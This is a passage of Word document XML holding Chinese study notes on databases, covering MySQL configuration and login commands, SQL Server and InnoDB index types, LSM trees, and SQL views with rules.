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3480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>大型数据库：</w:t>
      </w:r>
      <w:r>
        <w:t>Mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>、分布式</w:t>
      </w:r>
      <w:r>
        <w:t>redis</w:t>
      </w:r>
      <w:r>
        <w:t>、分布式</w:t>
      </w:r>
      <w:r>
        <w:t>nosql</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DB2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>先从数据库中以文本形式导出</w:t>
      </w:r>
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:t>万达人的积分数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:t>命令对文本进行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>将排序后的数据一条一条的更新到数据库中</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>经过日志分析，所有过程大概</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个半小时，在每天的凌晨三四点钟运行，步骤</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>共占用几分钟时间，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>剩下的时间都消耗在数据库更新上（表锁）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265B70" w:rsidRPr="00265B70" w:rsidRDefault="00265B70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">TSDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Time Series Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，时序数据库，用于保存时间序列（按时间顺序变化）的海量数据</w:t>
      </w:r>
      <w:r w:rsidR="00164007">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00164007">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>排行</w:t>
      </w:r>
      <w:r w:rsidR="00164007">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00164007" w:rsidRPr="002A003C">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://db-engines.com/en/ranking/time+series+dbms</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00164007">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>还有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空间数据库、关系数据库、多媒体数据库、流数据库（据说只能查当前时间下的流数据）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>看一下一共有多少个配置文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>root@ubuntu:/etc/mysql/conf.d# mysql --help | grep my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">                      order of preference, my.cnf, $MYSQL_TCP_PORT,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>/etc/my.cnf /etc/mysql/my.cnf ~/.my.cnf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/mysql/mysql.conf.d/mysqld.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>（而不是网上说的</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/mysql/my.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>里面的</w:t>
      </w:r>
      <w:r>
        <w:t>bind-address= 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>与本地进行了绑定，所以默认情况下将只有本地可以访问数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>按照类名设置数据字段名，因为这是最好的可读性。不过反正使用的时候大小写都是可以的。数据库无视大小写的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>DataGrip</w:t>
      </w:r>
      <w:r>
        <w:t>建立数据表的时候发现：需要</w:t>
      </w:r>
      <w:r>
        <w:t>VARCHAR(20)</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:t>，否则就会说</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语句出错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>中存储的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>数据就是结构化数据。回想一下信息检索教的内容，文本才是非结构化数据。</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t>不一定就是未格式化的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>对数据库文件的加密，传闻本地数据库对象对数据库性能的影响可以达到</w:t>
      </w:r>
      <w:r>
        <w:t>15%~20%</w:t>
      </w:r>
      <w:r>
        <w:t>。磁盘加密</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>》文件加密</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>》数据库自带加密</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>》数据库扩展加密（通过使用视图、触发器、扩展索引等机制，实现透明加密）</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>》数据库网关和驱动加密（前端部署一个数据库加密网关，后者使用</w:t>
      </w:r>
      <w:r>
        <w:t>jdbc</w:t>
      </w:r>
      <w:r>
        <w:t>驱动自己实现加密）</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>》应用加密网关</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>可以认为没有数据库内核这种东西。能够搜索到的东西都不知道在讲些什么，感觉就是介绍数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql -u root&lt;=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>不过</w:t>
      </w:r>
      <w:r>
        <w:t>mysql -u guest</w:t>
      </w:r>
      <w:r>
        <w:t>被禁止了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> mysql -u guest -p collage </w:t>
      </w:r>
      <w:r>
        <w:t>就是用</w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:t>账户进入数据库的</w:t>
      </w:r>
      <w:r>
        <w:t>collage</w:t>
      </w:r>
      <w:r>
        <w:t>数据表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">show create table xxx; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5479415" cy="3236595"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="6" name="Picture 6" descr="u=2599659019,1753795092&amp;fm=173&amp;app=25&amp;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2599659019,1753795092&amp;fm=173&amp;app=25&amp;f=JPEG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5479415" cy="3236595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>建立索引的好处是能够提高查询速度，常用作连接属性以及常出现在查询条件中的应该被建立为索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>建立索引：</w:t>
      </w:r>
      <w:r>
        <w:t>CREATE [UNIQUE][CLUSTERED|NONCLUSTERED]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   INDEX &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>索引名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>ON &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; (&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; [&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>次序</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;,[…]]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>UNIQUE(</w:t>
      </w:r>
      <w:r>
        <w:t>单一索引</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>唯一索引，不允许存在索引值相同的两行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CLUSTERED(</w:t>
      </w:r>
      <w:r>
        <w:t>聚集索引</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>索引项的顺序与表中记录的物理顺序一致。表中如果有多个记录在索引字段上相同，这些记录构成一簇，只有一个索引值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>优点：查询速度快。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>缺点：维护成本高，且一个表只能建一个聚簇索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>NONCLUSTERED(</w:t>
      </w:r>
      <w:r>
        <w:t>非聚集索引</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>作为非聚集索引，行的物理排序独立于索引排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>非聚集索引的叶级包含索引行（</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>＋树、</w:t>
      </w:r>
      <w:r>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>树）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>删除索引：</w:t>
      </w:r>
      <w:r>
        <w:t>DROP INDEX &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>索引名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InnoDB: The PRIMARY KEY is UNIQUE and clustered -- always. Secondary keys are non-clustered. They have the PRIMARY KEY (not a rownum or rowid) in the leaf node of the secondary key index.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MyISAM: Keys are non-clustered -- always. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>树</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>（Log-Structured Merge Tree）</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hbase</w:t>
      </w:r>
      <w:r>
        <w:t>采用的创建索引的方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:firstLine="500"/>
      </w:pPr>
      <w:r>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>的基本思想是将修改的数据保存在内存，达到一定数量后在将修改的数据批量写入磁盘，在写入的过程中与之前已经存在的数据做合并。同</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>树存储模型一样，</w:t>
      </w:r>
      <w:r>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>存储模型也支持增、删、读、改以及顺序扫描操作。</w:t>
      </w:r>
      <w:r>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>模型利用批量写入解决了随机写入的问题，虽然牺牲了部分读的性能，但是大大提高了写的性能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:firstLine="500"/>
      </w:pPr>
      <w:r>
        <w:t>使用日志文件和内存存储来将随机写转换成顺序写。</w:t>
      </w:r>
      <w:r>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>树的主要目标是快速的建立索引，在大并发插入数据的情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:t>树需要大量的随机</w:t>
      </w:r>
      <w:r>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:t>，这些随机</w:t>
      </w:r>
      <w:r>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:t>严重影响索引建立速度。</w:t>
      </w:r>
      <w:r>
        <w:t>LSM</w:t>
      </w:r>
      <w:r>
        <w:t>通过磁盘序列写，来达到最优的写性能，因为这个降低了磁盘的寻道次数，一次</w:t>
      </w:r>
      <w:r>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:t>可以写入多个索引块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480">
      <w:pPr>
        <w:ind w:firstLine="500"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480">
      <w:pPr>
        <w:ind w:firstLine="500"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>视图显示的时候可能只显示虚拟表，这种表是由命令构建成，不存放具体的数据，对数据有保护作用。图形软件显示的时候，使用的视图就是虚拟表，只有点击了同步或者使用了自动同步以后才会对数据库中的数据造成影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:t>建立信息系学生的视图，并要求进行修改和插入操作时仍须保证该视图只有信息系的学生</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>CREATE VIEW IS_Student AS SELECT Sno, Sname, Sage FROM Student WHERE Sdept='IS' [CHECK</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">];  </w:t>
      </w:r>
      <w:r>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WITH CHECK OPTION</w:t>
      </w:r>
      <w:r>
        <w:t>保证更新时满足视图定义的谓词条件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create view student_total_avg(total_avg) as select avg(total) from student_total;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">create or replace view cs_instructor as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  select * </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    from instructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    where dept_name = 'Comp.Sci.';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>DROP VIEW &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>视图名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; [CASCADE|RESTRICT];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">CASCADE </w:t>
      </w:r>
      <w:r>
        <w:t>级联删除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>同时删除从之导出来的视图。父表中删除包含主键值的行的操作，该值由子表的现有行中的外键列引用。在级联删除中，删除父表中的记录时，同时删除子表中外键引用此主键的记录。级联操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>。通过级联或者决绝执行来保证数据的完整性。级联是用来设计一对多关系的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">RESTRICT </w:t>
      </w:r>
      <w:r>
        <w:t>受限删除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>默认</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>创建视图以后之后就可以使用这个视图（就像真的存在这个表一样）。其实</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>会自己将命令整合到一起进行最终的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>视图设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rule </w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trigger </w:t>
      </w:r>
      <w:r>
        <w:t>以后才能接受正常的</w:t>
      </w:r>
      <w:r>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>等操作语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">create or replace rule r_i_cs_instructor1 as on insert to cs_instructor do instead nothing; </w:t>
      </w:r>
      <w:r>
        <w:t>消除原先查询的运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>create or replace rule r_i_cs_instructor2 as on insert to cs_instructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  where (new.dept_name = 'Comp.Sci.') do instead </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
